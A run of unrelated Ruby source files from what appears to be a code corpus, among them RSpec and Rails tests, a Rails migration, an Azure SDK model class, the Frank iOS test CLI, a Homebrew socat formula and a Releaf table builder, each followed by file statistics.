it "returns the correct array if an instance variable is added" do
a = 0
lambda{ a.instance_variable_set("@test", 1) }.should raise_error(RuntimeError)
end
end
describe "regular objects" do
it "returns an empty array if no instance variables are defined" do
Object.new.instance_variables.should == []
end
it "returns the correct array if an instance variable is added" do
a = Object.new
a.instance_variable_set("@test", 1)
a.instance_variables.should == [:@test]
end
end
end
| 30.535714 | 84 | 0.692398 |
e9d2e64d0f1196c5b825e5a775c0ed7eb2c185ec | 131 | class RemoveUseridFromPackage < ActiveRecord::Migration[5.0]
def change
remove_column :packages, :user_id, :string
end
end
| 21.833333 | 60 | 0.763359 |
1ae66b2671130fa584d957d55e13c1215e9ed9a0 | 249 | Kaminari.configure do |config|
config.default_per_page = 25
config.max_per_page = 100
config.window = 2
# config.outer_window = 0
# config.left = 0
# config.right = 0
# config.page_method_name = :page
# config.param_name = :page
end
| 22.636364 | 35 | 0.698795 |
38b760a26ac52497b0bf8171fd448d79e18584db | 3,095 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_04_01
module Models
#
# Result of the request to list all P2SVpnServerConfigurations associated
# to a VirtualWan. It contains a list of P2SVpnServerConfigurations and a
# URL nextLink to get the next set of results.
#
class ListP2SVpnServerConfigurationsResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<P2SVpnServerConfiguration>] List of
# P2SVpnServerConfigurations.
attr_accessor :value
# @return [String] URL to get the next set of operation list results if
# there are any.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<P2SVpnServerConfiguration>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [ListP2SVpnServerConfigurationsResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for ListP2SVpnServerConfigurationsResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ListP2SVpnServerConfigurationsResult',
type: {
name: 'Composite',
class_name: 'ListP2SVpnServerConfigurationsResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'P2SVpnServerConfigurationElementType',
type: {
name: 'Composite',
class_name: 'P2SVpnServerConfiguration'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 30.048544 | 80 | 0.557997 |
7a3659c128fdda56c42382161366070a259fc030 | 247 | require "sprockets"
require "sprockets/es6"
require "roger_sprockets/version"
module RogerSprockets; end
# Load modules
require File.dirname(__FILE__) + "/roger_sprockets/middleware"
require File.dirname(__FILE__) + "/roger_sprockets/processor"
| 24.7 | 62 | 0.805668 |
79d9aa706074a30da2a80cc1ef85ecc140230c4f | 3,116 | # frozen_string_literal: true
# The Jak namespace
module Jak
# The MyAbility Class which is the child of JakAbility
class MyAbility < JakAbility
def initialize(resource, &block)
# Invoke Jak Ability methods
super do
instance_eval(&block) if block_given?
end
# Bail out early
unless resource.present?
puts 'Jak::MyAbility.initialize - Bail out No Resource Present!'
return
end
# This is the dynamic permission functionality
@yielded_namespaces.each do |namespace|
next unless resource.respond_to?(:permissions, namespace)
my_namespace = Jak.namespace_manager.find(namespace)
# 360 no namespace
raise NotImplementedError, "Namespace: '#{namespace}' was not found!" unless my_namespace
if my_namespace.scoped_to_tenant?
# Limited by Jak.tenant_id_column
tenant_id_column = "#{Jak.tenant_id_column}_id"
# Unrestricted Permissions: Not limited to the current_user per se.
resource.permissions(namespace).select { |k| k.restricted == false }.each do |permission|
# Check the resources permissions
if permission.klass.constantize.column_names.include?(tenant_id_column)
# Does this model have a tenant_id column in it...
can permission.action.to_sym, permission.klass.constantize, tenant_id_column.to_sym => resource.send(tenant_id_column)
else
# Is it the tenant itself?
can permission.action.to_sym, permission.klass.constantize, id: resource.send(tenant_id_column)
end
end
# Restricted Permissions: Limit to not only the tenant (optionally), but to the column specified
# For example:
# can :show, Lead, company_id: current_user.company_id, assignable_id: user.id
# Is saying that they can show the leads for the company they're a part of and for leads assigned to this User.
resource.permissions(namespace).select { |k| k.restricted == true }.each do |permission|
# Check the resources permissions
if permission.klass.constantize.column_names.include?(tenant_id_column)
# puts "Doing that thing you want, for namespace: '#{namespace}', for klass: '#{permission.klass}', upon action of '#{permission.action}'"
can permission.action.to_sym, permission.klass.constantize, tenant_id_column.to_sym => resource.send(tenant_id_column), permission.klass.constantize.send("my_#{namespace}_restrictions").to_sym => resource.id
else
# Is it the tenant itself?
can permission.action.to_sym, permission.klass.constantize, id: resource.send(tenant_id_column)
end
end
else
# Absolute power! (Not restricted by Jak.tenant_id_column)
resource.permissions(namespace).each do |permission|
can permission.action.to_sym, permission.klass.constantize
end
end
end # end @yielded_namespaces.each
end # end initialize
end
end
| 45.823529 | 221 | 0.667202 |
61bd8a1c0e73022150135a4f8d2b3a3d945c41ff | 14,013 | begin
require 'pry'
rescue LoadError
end
require 'thor'
require 'frank-cucumber/launcher'
require 'frank-cucumber/console'
require 'frank-cucumber/frankifier'
require 'frank-cucumber/mac_launcher'
require 'frank-cucumber/plugins/plugin'
require 'xcodeproj'
module Frank
class CLI < Thor
include Thor::Actions
def self.source_root
File.join( File.dirname(__FILE__), '..','..','frank-skeleton' )
end
# included just because the old setup script was called frank-skeleton
desc "skeleton", "an alias for setup"
def skeleton
invoke :setup
end
WITHOUT_SERVER = "without-cocoa-http-server"
WITHOUT_ASYNC_SOCKET = "without-cocoa-async-socket"
WITHOUT_LUMBERJACK = "without-cocoa-lumberjack"
desc "setup", "set up your iOS app by adding a Frank subdirectory containing everything Frank needs"
method_option WITHOUT_SERVER, :type => :boolean
method_option WITHOUT_ASYNC_SOCKET, :type => :boolean
method_option WITHOUT_LUMBERJACK, :type => :boolean
method_option :build_configuration, :aliases=>'--conf', :type=>:string, :default => 'Debug'
method_option :target, :type=>:string
method_option :project, :type=>:string
def setup
@libs = %w(Shelley CocoaAsyncSocket CocoaLumberjack CocoaHTTPServer Frank)
@libsMac = %w(ShelleyMac CocoaAsyncSocketMac CocoaLumberjackMac CocoaHTTPServerMac FrankMac)
@libs -= %w(CocoaHTTPServer) if options[WITHOUT_SERVER]
@libsMac -= %w(CocoaHTTPServerMac) if options[WITHOUT_SERVER]
@libs -= %w(CocoaAsyncSocket) if options[WITHOUT_ASYNC_SOCKET]
@libsMac -= %w(CocoaAsyncSocketMac) if options[WITHOUT_ASYNC_SOCKET]
@libs -= %w(CocoaLumberjack) if options[WITHOUT_LUMBERJACK]
@libsMac -= %w(CocoaLumberjackMac) if options[WITHOUT_LUMBERJACK]
directory ".", "Frank"
Frankifier.frankify!( File.expand_path('.'), :build_config => options[:build_configuration], :target => options[:target], :project => options[:project] )
end
desc "update", "updates the frank server components inside your Frank directory"
long_desc "This updates the parts of Frank that are embedded inside your app (e.g. libFrank.a and frank_static_resources.bundle)"
def update
%w{libFrank.a libCocoaAsyncSocket.a libCocoaLumberjack.a libCocoaHTTPServer.a libShelley.a libFrankMac.a libShelleyMac.a libCocoaAsyncSocketMac.a libCocoaLumberjackMac.a libCocoaHTTPServerMac.a}.each do |f|
copy_file f, File.join( 'Frank', f ), :force => true
end
directory( 'frank_static_resources.bundle', 'Frank/frank_static_resources.bundle', :force => true )
if yes? "\nOne or more static libraries may have been updated. For these changes to take effect the 'frankified_build' directory must be cleaned. Would you like me to do that now? Type 'y' or 'yes' to delete the contents of frankified_build."
remove_file('Frank/frankified_build')
end
end
XCODEBUILD_OPTIONS = %w{workspace project scheme target configuration}
desc "build [<buildsetting>=<value>]...", "builds a Frankified version of your native app"
XCODEBUILD_OPTIONS.each do |option|
method_option option
end
WITHOUT_DEPS = 'without-dependencies'
method_option 'no-plugins', :type => :boolean, :default => false, :aliases => '--np', :desc => 'Disable plugins'
method_option 'arch', :type => :string, :default => 'i386'
method_option :noclean, :type => :boolean, :default => false, :aliases => '--nc', :desc => "Don't clean the build directory before building"
method_option WITHOUT_DEPS, :type => :array, :desc => 'An array (space separated list) of plugin dependencies to exclude'
def build(*args)
clean = !options['noclean']
use_plugins = !options['no-plugins']
exclude_dependencies = options[WITHOUT_DEPS] || []
in_root do
unless File.directory? 'Frank'
if yes? "You don't appear to have set up a Frank directory for this project. Would you like me to set that up now? Type 'y' or 'yes' if so."
invoke :skeleton
else
say "OK, in that case there's not much I can do for now. Whenever you change your mind and want to get your project setup with Frank simply run `frank setup` from the root of your project directory."
say "Bye bye for now!"
exit 11
end
end
end
static_bundle = 'frank_static_resources.bundle'
if clean
remove_dir build_output_dir
end
build_steps = 'build'
if clean
build_steps = 'clean ' + build_steps
end
plugins = use_plugins ? gather_plugins : []
say "Detected plugins: #{plugins.map {|p| p.name}.join(', ')}" unless plugins.empty?
say "Excluding plugin dependencies: #{exclude_dependencies.join(', ')}" unless exclude_dependencies.empty?
plugins.each {|plugin| plugin.write_xcconfig(exclude_dependencies)}
xcconfig_data = Frank::Plugins::Plugin.generate_core_xcconfig(plugins)
xcconfig_file = 'Frank/frank.xcconfig'
File.open(xcconfig_file,'w') {|f| f.write(xcconfig_data) }
extra_opts = XCODEBUILD_OPTIONS.map{ |o| "-#{o} \"#{options[o]}\"" if options[o] }.compact.join(' ')
# If there is a scheme specified we don't want to inject the default configuration
# If there is a configuration specified, we also do not want to inject the default configuration
if options['scheme'] || options['configuration']
separate_configuration_option = ""
else
separate_configuration_option = "-configuration Debug"
end
build_mac = determine_build_patform(options) == :osx
xcodebuild_args = args.join(" ")
if build_mac
run %Q|xcodebuild -xcconfig #{xcconfig_file} #{build_steps} #{extra_opts} #{separate_configuration_option} DEPLOYMENT_LOCATION=YES DSTROOT="#{build_output_dir}" FRANK_LIBRARY_SEARCH_PATHS="#{frank_lib_search_paths}" #{xcodebuild_args}|
else
extra_opts += " -arch #{options['arch']}"
run %Q|xcodebuild -xcconfig #{xcconfig_file} #{build_steps} #{extra_opts} #{separate_configuration_option} -sdk iphonesimulator ONLY_ACTIVE_ARCH=NO DEPLOYMENT_LOCATION=YES DSTROOT="#{build_output_dir}" FRANK_LIBRARY_SEARCH_PATHS="#{frank_lib_search_paths}" #{xcodebuild_args}|
end
exit $?.exitstatus if not $?.success?
app = Dir.glob("#{build_output_dir}/*.app").delete_if { |x| x =~ /\/#{app_bundle_name}$/ }
app = app.first
FileUtils.cp_r("#{app}/.", frankified_app_dir)
if build_mac
in_root do
FileUtils.cp_r(
File.join( 'Frank',static_bundle),
File.join( frankified_app_dir, "Contents", "Resources", static_bundle )
)
end
else
fix_frankified_apps_bundle_identifier
in_root do
FileUtils.cp_r(
File.join( 'Frank',static_bundle),
File.join( frankified_app_dir, static_bundle )
)
end
end
end
desc "build_and_launch", "rebuild a Frankfied version of your app then launch"
def build_and_launch
invoke :build
invoke :launch
end
desc "launch", "open the Frankified app in the simulator"
method_option :debug, :type => :boolean, :default => false
method_option :idiom, :banner => 'iphone|ipad', :type => :string, :default => (ENV['FRANK_SIM_IDIOM'] || 'iphone')
def launch
$DEBUG = options[:debug]
launcher = case options[:idiom].downcase
when 'iphone'
SimLauncher::DirectClient.for_iphone_app( frankified_app_dir )
when 'ipad'
SimLauncher::DirectClient.for_ipad_app( frankified_app_dir )
else
say "idiom must be either iphone or ipad. You supplied '#{options[:idiom]}'", :red
exit 10
end
in_root do
unless File.exists? frankified_app_dir
say "A Frankified version of the app doesn't appear to have been built. Building one now"
say "..."
invoke :build
end
if built_product_is_mac_app( frankified_app_dir )
launcher = Frank::MacLauncher.new( frankified_app_dir )
say "LAUNCHING APP..."
else
say "LAUNCHING IN THE SIMULATOR..."
end
launcher.relaunch
end
end
desc "inspect", "launch Symbiote in the browser"
long_desc "launch Symbiote in the browser so you can inspect the live state of your Frankified app"
def inspect
# TODO: check whether app is running (using ps or similar), and launch it if it's not
run 'open http://localhost:37265'
end
desc 'console', "launch a ruby console connected to your Frankified app"
method_option :bonjour, :type => :boolean, :default => false, :aliases => :b, :desc => "find Frank via Bonjour."
method_option :server, :type => :string, :default => false, :aliases => :s, :desc => "server URL for Frank."
def console
# TODO: check whether app is running (using ps or similar), and launch it if it's not
begin
require 'pry'
rescue LoadError
say 'The Frank console requires the pry gem.'
say 'Simply run `sudo gem install pry` (the `sudo` bit might be optional), and then try again. Thanks!'
exit 41
end
Frank::Cucumber::FrankHelper.use_shelley_from_now_on
console = Frank::Console.new
Frank::Cucumber::FrankHelper.test_on_physical_device_via_bonjour if options[:bonjour]
Frank::Cucumber::FrankHelper.server_base_url = options[:server] if options[:server]
if console.check_for_running_app
console.pry
end
end
private
def product_name
"Frankified"
end
def app_bundle_name
"#{product_name}.app"
end
def frank_lib_directory
File.expand_path "Frank"
end
def frank_lib_search_paths
paths = [frank_lib_directory]
each_plugin_path do |path|
paths << path
end
paths.map {|path| %Q[\\"#{path}\\"]}.join(' ')
end
def build_output_dir
File.expand_path "Frank/frankified_build"
end
def frankified_app_dir
File.join( build_output_dir, app_bundle_name )
end
def plugin_dir
File.expand_path 'Frank/plugins'
end
def built_product_is_mac_app ( app_dir )
return File.exists? File.join( app_dir, "Contents", "MacOS" )
end
def fix_frankified_apps_bundle_identifier
# as of iOS 6 the iOS Simulator locks up with a black screen if you try and launch an app which has the same
# bundle identifier as a previously installed app but which is in fact a different app. This impacts us because our
# Frankified app is different but has the same bundle identifier as the standard non-Frankified app which most users
# will want to have installed in the simulator as well.
#
# We work around this by modifying the Frankified app's bundle identifier inside its Info.plist.
inside frankified_app_dir do
existing_bundle_identifier = `/usr/libexec/PlistBuddy -c 'Print :CFBundleIdentifier' Info.plist`.chomp
new_bundle_identifier = existing_bundle_identifier + '.frankified'
run %Q|/usr/libexec/PlistBuddy -c 'Set :CFBundleIdentifier #{new_bundle_identifier}' Info.plist|
run %Q|/usr/libexec/PlistBuddy -c 'Set :CFBundleDisplayName Frankified' Info.plist|
end
end
# The xcodeproj gem doesn't currently support schemes, and schemes have been difficult
# to figure out. I plan to either implement schemes in xcodeproj at a later date, or
# wait for them to be implemented, and then fix this function
def determine_build_patform ( options )
project_path = nil
if options["workspace"] != nil
if options["scheme"] != nil
workspace = Xcodeproj::Workspace.new_from_xcworkspace(options["workspace"])
projects = workspace.projpaths
projects.each { | current_project |
lines = `xcodebuild -project "#{current_project}" -list`
found_schemes = false
lines.split("\n").each { | line |
if found_schemes
line = line[8..-1]
if line == ""
found_schemes = false
else
if line == options["scheme"]
project_path = current_project
end
end
else
line = line [4..-1]
if line == "Schemes:"
found_schemes = true
end
end
}
}
else
say "You must specify a scheme if you specify a workplace"
exit 10
end
else
project_path = options["project"]
end
if project_path == nil
Dir.foreach(Dir.pwd) { | file |
if file.end_with? ".xcodeproj"
if project_path != nil
say "You must specify a project if there are more than one .xcodeproj bundles in a directory"
exit 10
else
project_path = file
end
end
}
end
project = Xcodeproj::Project.new(project_path)
target = nil
if options["target"] != nil
project.targets.each { | proj_target |
if proj_target.name == options["target"]
target = proj_target
end
}
else
target = project.targets[0]
end
if target == nil
say "Unable to determine a target from the options provided. Assuming iOS"
return :ios
end
return target.platform_name
end
def each_plugin_path(&block)
plugin_glob = File.join("#{plugin_dir}",'*')
Dir[plugin_glob].map do |plugin_path|
yield plugin_path
end
end
def gather_plugins
each_plugin_path do |plugin_path|
Frank::Plugins::Plugin.from_plugin_directory(plugin_path)
end
end
end
end
| 36.492188 | 284 | 0.651752 |
ff7da39a7ba452940f4101f006112b17a82e3a0e | 2,045 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
def setup
@user = User.new(name: "Example User", email: "[email protected]", password: "foobar", password_confirmation: "foobar")
end
test "should be valid" do
assert @user.valid?
end
test "name should be present" do
@user.name = " "
assert_not @user.valid?
end
test "email should be present" do
@user.email = " "
assert_not @user.valid?
end
test "name should not be too long" do
@user.name = "a" * 51
assert_not @user.valid?
end
test "email should not be too long" do
@user.email = "a" * 244 + "@example.com"
assert_not @user.valid?
end
test "email validation should accept valid addresses" do
valid_addresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_addresses.each do |valid_address|
@user.email = valid_address
assert @user.valid?, "#{valid_address.inspect} should be valid"
end
end
test "email validation should reject invalid addresses" do
invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com]
invalid_addresses.each do |invalid_address|
@user.email = invalid_address
assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
end
end
test "email addresses should be unique" do
duplicate_user = @user.dup
@user.save
assert_not duplicate_user.valid?
end
test "password should be present (nonblank)" do
@user.password = @user.password_confirmation = " " * 6
assert_not @user.valid?
end
test "password should have a minimum length" do
@user.password = @user.password_confirmation = "a" * 5
assert_not @user.valid?
end
test "authenticated? should return false for a user with nil digest" do
assert_not @user.authenticated?('')
end
test "authenticated? should return false for a user with nil digest" do
assert_not @user.authenticated?(:remember, '')
end
end | 28.402778 | 122 | 0.68802 |
01c549fa4a3c6ca5aac376fde52ee3b0ba64fe3c | 1,072 | class Socat < Formula
desc "netcat on steroids"
homepage "http://www.dest-unreach.org/socat/"
url "http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz"
sha256 "ce3efc17e3e544876ebce7cd6c85b3c279fda057b2857fcaaf67b9ab8bdaf034"
bottle do
cellar :any
sha256 "63cba17ba8512ae70e018d6e918b67e4d3646bbd44b6aa77d7e4c92833f4a79c" => :sierra
sha256 "65e0fd67dbb8f8615110beb7a10710aa73ec8cd4dcfb19408558a56d368728e2" => :el_capitan
sha256 "8bbbe3d993e937ee42499de4efdf02c168c97b30bb75077e5489c4b165829e1f" => :yosemite
end
devel do
url "http://www.dest-unreach.org/socat/download/socat-2.0.0-b9.tar.gz"
version "2.0.0-b9"
sha256 "f9496ea44898d7707507a728f1ff16b887c80ada63f6d9abb0b727e96d5c281a"
end
depends_on "readline"
depends_on "openssl"
def install
system "./configure", "--prefix=#{prefix}", "--mandir=#{man}"
system "make", "install"
end
test do
output = pipe_output("#{bin}/socat - tcp:www.google.com:80", "GET / HTTP/1.0\r\n\r\n")
assert_match "HTTP/1.0", output.lines.first
end
end
| 32.484848 | 92 | 0.738806 |
62f7a738045c338736b769ccb7c19d33a2176883 | 6,752 | class Releaf::Builders::TableBuilder
include Releaf::Builders::Base
include Releaf::Builders::Toolbox
attr_accessor :collection, :options, :template, :resource_class
def initialize(collection, resource_class, template, options)
self.collection = collection
self.options = options
self.template = template
self.resource_class = resource_class
end
def column_names
Releaf::ResourceTableFields.new(resource_class).values(include_associations: false)
end
def columns
@columns ||= columns_schema
end
def columns_schema
data = {}
final_column_names = []
final_column_names += column_names
final_column_names << :toolbox if options[:toolbox] == true
final_column_names.map do|column|
if cell_method(column)
data[column] = {cell_method: cell_method(column)}
elsif cell_content_method(column)
data[column] = {content_method: cell_content_method(column)}
else
data[column] = {format_method: cell_format_method(column)}
end
end
data
end
def output
tag(:table, table_attributes) do
if collection.empty?
empty_body
else
head << body
end
end
end
def table_attributes
{class: ["table", resource_class.name.pluralize.underscore.dasherize]}
end
def head
tag(:thead) do
tag(:tr) do
content = ActiveSupport::SafeBuffer.new
columns.each_pair do|column, _options|
content << head_cell(column)
end
content
end
end
end
def head_cell(column)
tag(:th) do
head_cell_content(column)
end
end
def head_cell_content(column)
unless column.to_sym == :toolbox
attribute = column.to_s.tr(".", "_")
resource_class.human_attribute_name(attribute)
end
end
def empty_body
tag(:tr) do
tag(:th) do
tag(:div, class: "nothing-found") do
t("Nothing found")
end
end
end
end
def body
tag(:tbody, class: "tbody") do
collection.collect do |resource|
row(resource)
end
end
end
def row_url(resource)
resource_action = row_url_action(resource)
url_for(action: resource_action, id: resource.id, index_path: index_path) if resource_action
end
def row_url_action(_resource)
if feature_available?(:show)
:show
elsif feature_available?(:edit)
:edit
end
end
def row_attributes(resource)
{
class: "row",
data: {
id: resource.id
}
}
end
def row(resource)
url = row_url(resource)
tag(:tr, row_attributes(resource)) do
content = ActiveSupport::SafeBuffer.new
columns.each_pair do|column, options|
cell_options = options.merge(url: url)
if options[:cell_method]
content << send(options[:cell_method], resource, cell_options)
else
content << cell(resource, column, cell_options)
end
end
content
end
end
def cell_content(resource, column, options)
if options[:content_method]
send(options[:content_method], resource)
else
send(options[:format_method], resource, column)
end
end
def format_text_content(resource, column)
truncate(column_value(resource, column).to_s, length: 32, separator: ' ')
end
def format_textarea_content(resource, column)
format_text_content(resource, column)
end
def format_richtext_content(resource, column)
value = ActionView::Base.full_sanitizer.sanitize(column_value(resource, column).to_s)
truncate(value, length: 32, separator: ' ')
end
def format_string_content(resource, column)
value = column_value(resource, column)
resource_title(value)
end
def format_boolean_content(resource, column)
t(column_value(resource, column) == true ? "Yes" : "No")
end
def format_date_content(resource, column)
value = column_value(resource, column)
I18n.l(value, format: :default) unless value.nil?
end
def format_datetime_content(resource, column)
value = column_value(resource, column)
format = Releaf::Builders::Utilities::DateFields.date_or_time_default_format(:datetime)
I18n.l(value, format: format) unless value.nil?
end
def format_time_content(resource, column)
value = column_value(resource, column)
format = Releaf::Builders::Utilities::DateFields.date_or_time_default_format(:time)
I18n.l(value, format: format) unless value.nil?
end
def format_association_content(resource, column)
format_string_content(resource, association_name(column))
end
def association_name(column)
column.to_s.sub(/_id$/, '').to_sym
end
def cell_method(column)
method_name = "#{column}_cell"
if respond_to? method_name
method_name
else
nil
end
end
def cell_content_method(column)
method_name = "#{column}_content"
if respond_to? method_name
method_name
else
nil
end
end
def column_type(klass, column)
column_description = klass.columns_hash[column.to_s]
if column_description
column_description.type
else
:string
end
end
def column_type_format_method(column)
klass = column_klass(resource_class, column)
type = column_type(klass, column)
type_format_method(type)
end
def type_format_method(type)
format_method = "format_#{type}_content".to_sym
if respond_to?(format_method)
format_method
else
:format_string_content
end
end
def column_klass(klass, column)
column.to_s.split(".")[0..-2].each do|part|
reflection = klass.reflect_on_association(part)
klass = reflection.klass if reflection
end
klass
end
def column_value(resource_or_value, column)
column.to_s.split(".").each do|part|
resource_or_value = resource_or_value.send(part) if resource_or_value.present?
end
resource_or_value
end
def cell_format_method(column)
if association_column?(column)
:format_association_content
else
column_type_format_method(column)
end
end
def association_column?(column)
!!(column =~ /_id$/) && resource_class.reflections[association_name(column).to_s].present?
end
def toolbox_cell(resource, options)
toolbox_args = {index_path: index_path}.merge(options.fetch(:toolbox, {}))
tag(:td, class: "only-icon toolbox-cell") do
toolbox(resource, toolbox_args)
end
end
def cell(resource, column, options)
content = cell_content(resource, column, options)
tag(:td) do
if options[:url].blank?
tag(:span) do
content
end
else
tag(:a, href: options[:url]) do
content
end
end
end
end
end
| 23.526132 | 96 | 0.674467 |
1146ac3fb2c2c3aed00d65a8f4bd30976f16bf41 | 811 | require "test_helper"
class Stats::ConversationTest < ActiveSupport::TestCase
setup do
Conversation.create!(developer: developers(:one), business: businesses(:one))
end
test "#sent counts all conversations" do
stats = Stats::Conversation.new(Conversation.all)
assert_equal 2, stats.sent
end
test "#replied counts conversations with a developer response" do
stats = Stats::Conversation.new(Conversation.all)
assert_equal 1, stats.replied
end
test "#replied_rate calcualtes the percentage of replied conversations" do
stats = Stats::Conversation.new(Conversation.all)
assert_equal 0.5, stats.replied_rate
end
test "#replied_rate handles no sent messages" do
stats = Stats::Conversation.new(Conversation.none)
assert_equal 0, stats.replied_rate
end
end
| 28.964286 | 81 | 0.749692 |
4aa2a0eaed6e06e61964254843984d8e0fd69866 | 152 | #
# Cookbook:: build_cookbook
# Recipe:: syntax
#
# Copyright:: 2017, Exosphere Data, LLC, All Rights Reserved.
include_recipe 'delivery-truck::syntax'
| 21.714286 | 61 | 0.743421 |
f8556e2e2a4735933eeaf2f1355dfb5604d503c6 | 590 | Numeric.unit = 20 # set to 1 for export at real scale, 10 or more for designing
GRID = true # turn on or off the grid lines
union do
difference do
union do
union do
(n_teeth = 4).times do |t|
a = 180.0 / n_teeth * t
rect(~2, ~16)[~-1, ~-8].rotate(a)
end
end
circle(~6)
end
circle(~4)
end
iso_tri(~6, ~3, fill: :red).flip_x.move(0, ~2)
end.move(~8, ~8)
(1..15).each do |i| # 16px grid
path([~i, 0], [~i, ~16], stroke: "orange", opacity: 0.6)
path([0, ~i], [~16, ~i], stroke: "orange", opacity: 0.6)
end if GRID
| 22.692308 | 79 | 0.538983 |
39c0ce363555f8f0621868ff580d9fc2dc26be16 | 62 | json.partial! "categoria/categorium", categorium: @categorium
| 31 | 61 | 0.806452 |
2690caa8987129904ff66fe9890a193614513df9 | 4,077 | # frozen_string_literal: true
require_relative '../../../../src/bin/helpers/gitlab/chart.rb'
require 'tmpdir'
describe Gitlab::Chart do
describe '.load_from_helm_ls' do
subject { described_class.load_from_helm_ls(data, release_name) }
let(:release_name) { 'production' }
let(:data) do
<<~EOS
[
{
"name": "production",
"revision": 1,
"updated":"2020-08-18 11:26:58.055761 -0400 EDT",
"status": "deployed",
"chart": "auto-deploy-app-1.2.3",
"app_version": "",
"namespace": "new-sentimentality-19561312-production"
},
{
"name": "production-canary",
"revision": 2,
"updated":"2020-08-18 11:26:58.055761 -0400 EDT",
"status": "deployed",
"chart": "auto-deploy-app-4.5.6",
"app_version": "",
"namespace": "new-sentimentality-19561312-production"
},
{
"name": "production-postgresql",
"revision": 9,
"updated":"2020-08-18 11:26:58.055761 -0400 EDT",
"status": "deployed",
"chart": "postgresql-8.2.1",
"app_version": "11.6.0",
"namespace": "new-sentimentality-19561312-production"
}
]
EOS
end
it 'correctly loads the chart' do
expect(subject.major).to eq(1)
expect(subject.minor).to eq(2)
expect(subject.patch).to eq(3)
end
context 'when release name is canary' do
let(:release_name) { 'production-canary' }
it 'correctly loads the chart' do
expect(subject.major).to eq(4)
expect(subject.minor).to eq(5)
expect(subject.patch).to eq(6)
end
end
context 'when release name does not exist' do
let(:release_name) { 'production-unknown' }
it 'returns nil' do
expect(subject).to be_nil
end
end
context 'when chart is not gitlab managed chart' do
let(:release_name) { 'production-postgresql' }
it 'returns nil' do
expect(subject).to be_nil
end
end
context 'when data is empty' do
let(:data) { '[]' }
it 'returns nil' do
expect(subject).to be_nil
end
end
context 'when data is nil' do
let(:data) { nil }
it 'raises an error' do
expect { subject }.to raise_error(TypeError)
end
end
context 'when data is not formatted in json' do
let(:data) { 'test' }
it 'raises an error' do
expect { subject }.to raise_error(JSON::ParserError)
end
end
end
describe '.load_from_chart_yml' do
let(:chart_yaml) do
<<~EOS
apiVersion: v1
description: GitLab's Auto-deploy Helm Chart
name: auto-deploy-app
version: 1.0.3
icon: https://gitlab.com/gitlab-com/gitlab-artwork/raw/master/logo/logo-square.png
EOS
end
it 'correctly loads the chart' do
in_chart_dir do |dir|
chart = described_class.load_from_chart_yml(dir)
expect(chart.major).to eq(1)
expect(chart.minor).to eq(0)
expect(chart.patch).to eq(3)
end
end
context 'when chart is not gitlab managed chart' do
let(:chart_yaml) do
<<~EOS
apiVersion: v1
description: GitLab's Auto-deploy Helm Chart
name: custom-chart
version: 1.0.3
icon: https://gitlab.com/gitlab-com/gitlab-artwork/raw/master/logo/logo-square.png
EOS
end
it 'returns nil' do
in_chart_dir do |dir|
chart = described_class.load_from_chart_yml(dir)
expect(chart).to be_nil
end
end
end
context 'when chart yaml is not found' do
it 'raises an error' do
expect { described_class.load_from_chart_yml('test') }.to raise_error(Errno::ENOENT)
end
end
def in_chart_dir
Dir.mktmpdir do |dir|
File.write("#{dir}/Chart.yaml", chart_yaml)
yield dir
end
end
end
end
| 25.803797 | 92 | 0.566348 |
6a243f28a1e26a0c4bc201f493c6f1ce1e5d28ea | 366 | module Stealth
module Services
module Messagebird
class MessagebirdServiceMessage < Stealth::ServiceMessage
attr_accessor :conversation_id,
:messagebird_id,
:platform,
:display_name,
:first_name,
:last_name
end
end
end
end
| 22.875 | 63 | 0.513661 |
088debb33ebea106ca066a3259b82359aae83dc5 | 686 | # Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "simplecov"
gem "minitest"
require "minitest/autorun"
require "minitest/focus"
require "minitest/rg"
| 32.666667 | 74 | 0.765306 |
6245c3e15ff0b0802add9c2b859a83cfa698fa5d | 1,403 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2014 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
